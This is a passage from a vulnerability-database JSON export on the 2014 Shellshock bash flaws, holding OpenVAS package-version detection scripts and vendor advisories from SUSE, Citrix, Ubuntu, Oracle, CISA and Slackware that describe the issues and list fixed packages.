script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5\", rpm:\"libreadline5~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-32bit\", rpm:\"libreadline5-32bit~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-x86\", rpm:\"bash-x86~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-x86\", rpm:\"libreadline5-x86~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T16:39:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310850676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850676", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850676\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:31:31 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\n\n This NVT has been deprecated because no proper information available\n from advisory link.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix command injection via environment variables.\n (CVE-2014-6271, CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1254-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as proper information is not available in advisory. There is also no bash~4.2~75.4.1 on opensuse. the complete NVT is wrong.\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259-1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T18:47:38", "description": "A number of security vulnerabilities have been identified in the\n `bash", "cvss3": {}, "published": "2014-12-18T00:00:00", "type": "openvas", "title": "Citrix XenServer Shellshock Security Update (CTX200223)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310105146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105146", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Citrix XenServer Shellshock Security Update (CTX200223)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:citrix:xenserver\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105146\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-02T13:53:24+0000\");\n\n script_name(\"Citrix XenServer Shellshock Security Update (CTX200223)\");\n\n script_xref(name:\"URL\", value:\"http://support.citrix.com/article/CTX200223\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed hotfixes.\");\n\n script_tag(name:\"solution\", value:\"Apply the hotfix referenced in the advisory.\");\n\n script_tag(name:\"summary\", value:\"A number of security vulnerabilities have been identified in the\n `bash' component of Citrix XenServer. These issues include those known as `Shellshock'\");\n\n script_tag(name:\"affected\", value:\"These issues affect all supported versions of Citrix XenServer up\n to and including Citrix XenServer 6.2 Service Pack 1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-02 13:53:24 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-18 17:37:46 +0100 (Thu, 18 Dec 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Citrix Xenserver Local Security Checks\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_xenserver_version.nasl\");\n script_mandatory_keys(\"xenserver/product_version\", \"xenserver/patches\");\n\n exit(0);\n}\n\ninclude(\"citrix_version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\nif( ! hotfixes = get_kb_item(\"xenserver/patches\") )\n exit( 0 );\n\npatches = make_array();\n\npatches['6.2.0'] = make_list( 'XS62ESP1014' );\npatches['6.1.0'] = make_list( 'XS61E044' );\npatches['6.0.2'] = make_list( 'XS602E037', 'XS602ECC013' );\npatches['6.0.0'] = make_list( 'XS60E041' );\n\ncitrix_xenserver_check_report_is_vulnerable( version:version, hotfixes:hotfixes, patches:patches );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:48:09", "description": "Tavis Ormandy discovered that the security fix for Bash included in \nUSN-2362-1 was incomplete. An attacker could use this issue to bypass \ncertain environment restrictions. (CVE-2014-7169)\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntu", "title": "Bash vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "USN-2363-1", "href": "https://ubuntu.com/security/notices/USN-2363-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T12:48:11", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch \nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS \npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in \nUSN-2362-1 was incomplete. An attacker could use this issue to bypass \ncertain environment restrictions. (CVE-2014-7169)\n", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "ubuntu", "title": "Bash vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-26T00:00:00", "id": "USN-2363-2", "href": "https://ubuntu.com/security/notices/USN-2363-2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:51:10", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain\nmalformed function definitions in the values of environment variables,\nwhich allows remote attackers to write to files or possibly have unknown\nother impact via a crafted environment, as demonstrated by vectors\ninvolving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution. NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2014-6271.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1373781>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7169>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | It was discovered that a build issue preventing the fix from being applied properly in the 4.3-7ubuntu1.2 package for Ubuntu 14.04 LTS. A respin was released to 4.3-7ubuntu1.3 to correct the issue, and USN-2363-2 was published.\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "UB:CVE-2014-7169", "href": "https://ubuntu.com/security/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:19", "description": "[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3075", "href": "http://linux.oracle.com/errata/ELSA-2014-3075.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:38", "description": "[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3078", "href": "http://linux.oracle.com/errata/ELSA-2014-3078.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:40", "description": "[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3076", "href": "http://linux.oracle.com/errata/ELSA-2014-3076.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "description": "[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3077", "href": "http://linux.oracle.com/errata/ELSA-2014-3077.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:46", "description": "[4.2.45-5.4]\n- CVE-2014-7169\n Resolves: #1146324\n[4.2.45-5.3]\n- amend patch to match upstream's\n Related: #1146324\n[4.2.45-5.2]\n- Fix-up the patch\n Related: #1141647", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-1306", "href": "http://linux.oracle.com/errata/ELSA-2014-1306.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:54", "description": "[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-09-26T00:00:00", "id": "ELSA-2014-3079", "href": "http://linux.oracle.com/errata/ELSA-2014-3079.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:20", "description": "Oracle has released security updates to address bash vulnerabilities found across multiple products.\n\nUS-CERT recommends users and administrators review the Oracle Security [Article](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>) for additional details, and apply updates as necessary.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2014/10/07/Oracle-Patches-Bash-Vulnerabilities>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "cisa", "title": "Oracle Patches Bash Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-10-10T00:00:00", "id": "CISA:B34E259AF2C60E40987A939F5D7742F9", "href": "https://us-cert.cisa.gov/ncas/current-activity/2014/10/07/Oracle-Patches-Bash-Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2021-07-28T14:46:44", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt.\n Patched an additional trailing string processing vulnerability discovered\n by Tavis Ormandy.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\n21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\nfa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nd319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\nfbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\na786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz\n\nSlackware -current package:\nbba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz\n\nSlackware x86_64 -current package:\n7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-4.2.048-i486-2_slack14.1.txz", "cvss3": {}, "published": "2014-09-25T20:38:49", "type": "slackware", "title": "[slackware-security] bash", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T20:38:49", "id": "SSA-2014-268-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:47", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/bash-3.1.018-i486-3_slack13.0.txz: Rebuilt.\n The patch for CVE-2014-7169 needed to be rebased against bash-3.1 in order\n to apply correctly. 